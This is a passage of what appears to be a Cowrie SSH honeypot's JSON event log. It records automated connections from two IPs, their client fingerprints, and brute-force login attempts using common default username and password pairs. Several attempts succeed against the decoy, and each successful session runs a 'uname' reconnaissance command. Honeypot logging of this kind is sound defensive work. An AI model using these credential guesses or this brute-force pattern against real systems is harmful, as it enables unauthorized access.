com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:49:16.298102Z","src_ip":"212.227.235.229","session":"50be40ee71ed"}
{"eventid":"cowrie.login.failed","username":"yue","password":"abcd1234","message":"login attempt [yue/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-31T04:49:16.353149Z","src_ip":"212.227.235.229","session":"54610d1c79a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38948,"dst_ip":"1.2.3.4","dst_port":22,"session":"687d04b8070e","protocol":"ssh","message":"New connection: 212.227.125.160:38948 (1.2.3.4:22) [session: 687d04b8070e]","sensor":"my-vps","timestamp":"2025-08-31T04:49:16.670002Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:49:16.670700Z","src_ip":"212.227.125.160","session":"687d04b8070e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:49:16.853784Z","src_ip":"212.227.125.160","session":"687d04b8070e"}
{"eventid":"cowrie.login.success","username":"root","password":"QWERTY123","message":"login attempt [root/QWERTY123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:49:17.402842Z","src_ip":"212.227.125.160","session":"687d04b8070e"}
{"eventid":"cowrie.login.failed","username":"yue","password":"abc1234","message":"login attempt [yue/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-31T04:49:17.483034Z","src_ip":"212.227.235.229","session":"54610d1c79a3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:49:17.783684Z","src_ip":"212.227.125.160","session":"687d04b8070e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:49:17.784444Z","src_ip":"212.227.125.160","session":"687d04b8070e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:49:17.968120Z","src_ip":"212.227.125.160","session":"687d04b8070e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:49:17.969246Z","src_ip":"212.227.125.160","session":"687d04b8070e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56032,"dst_ip":"1.2.3.4","dst_port":22,"session":"93f68accfa86","protocol":"ssh","message":"New connection: 212.227.125.160:56032 (1.2.3.4:22) [session: 93f68accfa86]","sensor":"my-vps","timestamp":"2025-08-31T04:49:18.252573Z"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:49:18.637707Z","src_ip":"212.227.235.229","session":"54610d1c79a3"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:49:18.782691Z","src_ip":"212.227.125.160","session":"93f68accfa86"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:49:18.783412Z","src_ip":"212.227.125.160","session":"93f68accfa86"}
{"eventid":"cowrie.login.failed","username":"psybnc","password":"psybnc","message":"login attempt [psybnc/psybnc] failed","sensor":"my-vps","timestamp":"2025-08-31T04:49:19.000162Z","src_ip":"212.227.235.229","session":"50be40ee71ed"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql","message":"login attempt [mysql/mysql] failed","sensor":"my-vps","timestamp":"2025-08-31T04:49:20.480171Z","src_ip":"212.227.125.160","session":"4e9a41b6b611"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"letmein","message":"login attempt [postgres/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T04:49:20.740950Z","src_ip":"212.227.125.160","session":"93f68accfa86"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57738,"dst_ip":"1.2.3.4","dst_port":22,"session":"3eabfc8fefa4","protocol":"ssh","message":"New connection: 212.227.235.229:57738 (1.2.3.4:22) [session: 3eabfc8fefa4]","sensor":"my-vps","timestamp":"2025-08-31T04:49:21.430746Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:49:21.434148Z","src_ip":"212.227.235.229","session":"3eabfc8fefa4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32880,"dst_ip":"1.2.3.4","dst_port":22,"session":"df8185eca825","protocol":"ssh","message":"New connection: 212.227.125.160:32880 (1.2.3.4:22) [session: df8185eca825]","sensor":"my-vps","timestamp":"2025-08-31T04:49:21.986285Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:49:21.987251Z","src_ip":"212.227.125.160","session":"df8185eca825"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:49:22.176041Z","src_ip":"212.227.125.160","session":"df8185eca825"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:49:22.316703Z","src_ip":"212.227.125.160","session":"93f68accfa86"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:49:22.750747Z","src_ip":"212.227.125.160","session":"df8185eca825"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33702,"dst_ip":"1.2.3.4","dst_port":22,"session":"52be04f5e4aa","protocol":"ssh","message":"New connection: 212.227.235.229:33702 (1.2.3.4:22) [session: 52be04f5e4aa]","sensor":"my-vps","timestamp":"2025-08-31T04:49:22.948012Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:49:23.144659Z","src_ip":"212.227.125.160","session":"df8185eca825"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:49:23.145381Z","src_ip":"212.227.125.160","session":"df8185eca825"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:49:23.336052Z","src_ip":"212.227.125.160","session":"df8185eca825"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:49:23.337170Z","src_ip":"212.227.125.160","session":"df8185eca825"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:49:23.970974Z","src_ip":"212.227.235.229","session":"3eabfc8fefa4"}
{"eventid":"cowrie.session.closed","duration":"33.0","message":"Connection lost after 33.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:49:24.022535Z","src_ip":"212.227.125.160","session":"4e9a41b6b611"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:49:24.878407Z","src_ip":"212.227.235.229","session":"50be40ee71ed"}
{"eventid":"cowrie.login.failed","username":"admian","password":"admin","message":"login attempt [admian/admin] failed","sensor":"my-vps","timestamp":"2025-08-31T04:49:24.910527Z","src_ip":"212.227.235.229","session":"3eabfc8fefa4"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:49:24.920623Z","src_ip":"212.227.235.229","session":"52be04f5e4aa"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:49:24.921413Z","src_ip":"212.227.235.229","session":"52be04f5e4aa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57740,"dst_ip":"1.2.3.4","dst_port":22,"session":"d39318deb9b9","protocol":"ssh","message":"New connection: 212.227.235.229:57740 (1.2.3.4:22) [session: d39318deb9b9]","sensor":"my-vps","timestamp":"2025-08-31T04:49:26.240530Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:49:26.297436Z","src_ip":"212.227.235.229","session":"d39318deb9b9"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:49:26.487586Z","src_ip":"212.227.235.229","session":"d39318deb9b9"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:49:26.518746Z","src_ip":"212.227.235.229","session":"3eabfc8fefa4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60680,"dst_ip":"1.2.3.4","dst_port":22,"session":"f06bd04818fa","protocol":"ssh","message":"New connection: 212.227.125.160:60680 (1.2.3.4:22) [session: f06bd04818fa]","sensor":"my-vps","timestamp":"2025-08-31T04:49:27.355150Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:49:27.355879Z","src_ip":"212.227.125.160","session":"f06bd04818fa"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:49:27.545302Z","src_ip":"212.227.125.160","session":"f06bd04818fa"}
{"eventid":"cowrie.login.failed","username":"es","password":"123","message":"login attempt [es/123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:49:28.114716Z","src_ip":"212.227.125.160","session":"f06bd04818fa"}
